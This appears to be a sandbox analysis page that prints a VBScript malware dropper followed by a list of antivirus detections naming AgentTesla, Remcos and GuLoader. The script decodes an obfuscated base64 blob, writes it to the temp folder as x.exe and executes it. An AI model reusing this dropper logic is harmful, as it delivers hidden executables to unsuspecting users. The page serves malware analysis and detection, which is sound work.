popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
' Initialize and validate base64 string
Dim base64String
base64String = ");;pQ****I********E****8**//8****Lg******************Q****a********************************************************************************************E****LoQ****4ft**nNIbg..)M0hk&&&..UaGlzIH..yb2dyYW0gbX;;zdC..iZS..ydW4gdW5kZXIg;;2luMzINCiQ3**************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************F..F****..M**Qk**G;;5CKg********************4**COgQs..**hk**G**g****LIL************CwK**g****..**********wC********E******..**********C******E********************Q********************F**U******E******************g************E******Q************Q******Q****************E********************************G**&&&**..Io********M**o****..4K************************************************s**k**bHg************
If Len(base64String) = 0 Then
WScript.Quit
End If
' Apply replacements to the base64 string with additional checks
If InStr(base64String, "**") > 0 Then
base64String = Replace(base64String, "**", "A")
End If
If InStr(base64String, ")") > 0 Then
base64String = Replace(base64String, ")", "T")
End If
If InStr(base64String, ";;") > 0 Then
base64String = Replace(base64String, ";;", "V")
End If
If InStr(base64String, "..") > 0 Then
base64String = Replace(base64String, "..", "B")
End If
If InStr(base64String, "&&&") > 0 Then
base64String = Replace(base64String, "&&&", "J")
End If
' Create MSXML2.DOMDocument object and handle any potential errors
Dim obj1, obj2
On Error Resume Next
Set obj1 = CreateObject("MSXML2.DOMDocument")
If Err.Number <> 0 Then
WScript.Quit
End If
On Error GoTo 0
' Create the element for base64 decoding
Set obj2 = obj1.createElement("text")
If obj2 Is Nothing Then
WScript.Quit
End If
obj2.DataType = "bin.base64"
obj2.Text = base64String
' Verify that the base64 string was correctly decoded
If Len(obj2.NodeTypedValue) = 0 Then
WScript.Quit
End If
' Prepare to write the binary data to a file in the temporary folder
Dim obj3, obj4, tempFolder, exePath
Set obj3 = CreateObject("ADODB.Stream")
Set obj4 = CreateObject("Scripting.FileSystemObject")
' Retrieve the temporary folder path and handle errors
On Error Resume Next
tempFolder = obj4.GetSpecialFolder(2)
If Err.Number <> 0 Then
WScript.Quit
End If
On Error GoTo 0
' Build the path to the executable file
exePath = obj4.BuildPath(tempFolder, "x.exe")
If Len(exePath) = 0 Then
WScript.Quit
End If
' Write the binary data to the file
obj3.Type = 1
obj3.Open
obj3.Write obj2.NodeTypedValue
' Validate the file before saving
If obj3.Size = 0 Then
WScript.Quit
End If
obj3.SaveToFile exePath, 2
obj3.Close
' Verify that the file was created successfully
If Not obj4.FileExists(exePath) Then
WScript.Quit
End If
' Execute the newly created executable file and check for errors
Dim obj6
Set obj6 = CreateObject("WScript.Shell")
On Error Resume Next
obj6.Run exePath, 1, True
If Err.Number <> 0 Then
WScript.Quit
End If
On Error GoTo 0
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CTX vba.dropper.generic
CAT-QuickHeal Clean
Skyhigh BehavesLike.VBS.Dropper.tp
ALYac GT:VB.AgentTesla.4.56A700B4
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec ISB.Dropper!gen1
ESET-NOD32 VBS/TrojanDropper.Agent.PIZ
TrendMicro-HouseCall Backdoor.VBS.REMCOS.YXEJOZ
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender GT:VB.AgentTesla.4.56A700B4
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan GT:VB.AgentTesla.4.56A700B4
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE GT:VB.AgentTesla.4.56A700B4
TrendMicro Backdoor.VBS.REMCOS.YXEJOZ
CMC Clean
Emsisoft GT:VB.AgentTesla.4.56A700B4 (B)
huorong Clean
FireEye GT:VB.AgentTesla.4.56A700B4
Jiangmin Clean
Varist ABApplication.KF
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Script.Trojan-Dropper.Generic.a
Gridinsoft Clean
Xcitium Clean
Arcabit GT:VB.AgentTesla.4.56A700B4
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Script/GuLoader.RP!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Agent/VBS!1.F4C6 (CLASSIC)
Yandex Trojan.Etecer.b3aNRz.27
Ikarus Win32.Outbreak
MaxSecure Clean
GData GT:VB.AgentTesla.4.56A700B4
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Trojan[dropper]:Win/GuLoader.RX8PHU
No IRMA results available.